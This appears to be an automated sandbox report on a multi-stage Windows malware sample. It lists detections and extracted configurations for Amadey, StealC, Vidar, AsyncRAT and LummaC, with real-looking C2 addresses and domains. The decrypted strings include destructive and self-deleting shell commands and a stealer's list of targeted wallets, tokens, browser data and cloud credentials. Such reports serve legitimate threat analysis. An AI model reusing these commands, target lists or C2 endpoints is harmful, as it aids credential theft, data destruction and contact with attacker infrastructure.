Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}
Source: 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}
Source: 22.3.Macromedia.com.36a8750.0.unpack	Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["cozyhomevpibes.cyou", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "FATE99--test"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	Virustotal: Detection: 64%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Virustotal: Detection: 57%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	Virustotal: Detection: 77%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Virustotal: Detection: 70%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Virustotal: Detection: 56%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exe	Virustotal: Detection: 33%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\dDFw6mJ[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\dDFw6mJ[1].exe	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Virustotal: Detection: 30%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe	Virustotal: Detection: 76%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\loqVSeJ[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\loqVSeJ[1].exe	Virustotal: Detection: 83%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Virustotal: Detection: 46%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	Virustotal: Detection: 41%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Virustotal: Detection: 46%	Perma Link

Multi AV Scanner detection for submitted file

Source: random.exe	Virustotal: Detection: 47%			Perma Link
Source: random.exe	ReversingLabs: Detection: 50%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[5].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\loqVSeJ[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: random.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 185.215.113.43
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: S-%lu-
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: abc3bc1985
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: skotes.exe
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Startup
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rundll32
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Programs
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: %USERPROFILE%
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cred.dll
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clip.dll
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: http://
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: https://
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /quiet
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /Plugins/
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: &unit=
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shell32.dll
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: kernel32.dll
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ProgramData\
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: AVAST Software
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Kaspersky Lab
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Panda Security
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Doctor Web
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 360TotalSecurity
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Bitdefender
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Norton
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Sophos
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Comodo
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: WinDefender
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 0123456789
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ------
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ?scr=1
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ComputerName
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: -unicode-
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: VideoID
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ProductName
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: CurrentBuild
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rundll32.exe
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: "taskkill /f /im "
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: " && timeout 1 && del
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: && Exit"
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: " && ren
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Powershell.exe
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shutdown -s -t 0
Source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	String decryptor: random
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: 7707
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: 159.100.19.137
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: 0.5.8
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: false
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: yBu0GW2G5zAc
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: false
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: null
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: false
Source: 22.3.Macromedia.com.36a8750.0.unpack	String decryptor: Default
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: cozyhomevpibes.cyou
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: importenptoc.com
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: voicesharped.com
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: inputrreparnt.com
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: torpdidebar.com
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: rebeldettern.com
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: actiothreaz.com
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: garulouscuto.com
Source: 23.2.e2b0a87ceb.exe.400000.0.raw.unpack	String decryptor: breedertremnd.com

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe

Code function: 23_2_00419A00 CryptUnprotectData,

23_2_00419A00

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 56.2.Fe36XBk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.8b3fbc1053.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.5a4a47dccd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2561414607.0000000000413000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.3022837158.0000000000413000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.3061697464.0000000000413000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5a4a47dccd.exe, 00000021.00000002.2561414607.0000000000410000.00000040.00000001.01000000.00000014.sdmp, 5a4a47dccd.exe, 00000021.00000003.2468246941.00000000047EF000.00000004.00001000.00020000.00000000.sdmp, Fe36XBk.exe, 00000038.00000003.2938226002.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, Fe36XBk.exe, 00000038.00000002.3022837158.0000000000410000.00000040.00000001.01000000.0000001D.sdmp, 8b3fbc1053.exe, 00000039.00000003.2957908777.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, 8b3fbc1053.exe, 00000039.00000002.3061697464.0000000000410000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5a4a47dccd.exe, 00000021.00000002.2598016348.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, 5a4a47dccd.exe, 00000021.00000002.2770842966.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 00000038.00000002.3026402216.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, 8b3fbc1053.exe, 00000039.00000002.3102238334.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdb source: dDFw6mJ.exe, 00000032.00000000.2785734747.00007FF662E99000.00000002.00000001.01000000.0000001C.sdmp, dDFw6mJ.exe, 00000032.00000002.2996317054.00007FF662E99000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb: source: 8b3fbc1053.exe, 00000039.00000003.2957908777.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, 8b3fbc1053.exe, 00000039.00000002.3061697464.0000000000410000.00000040.00000001.01000000.0000001E.sdmp
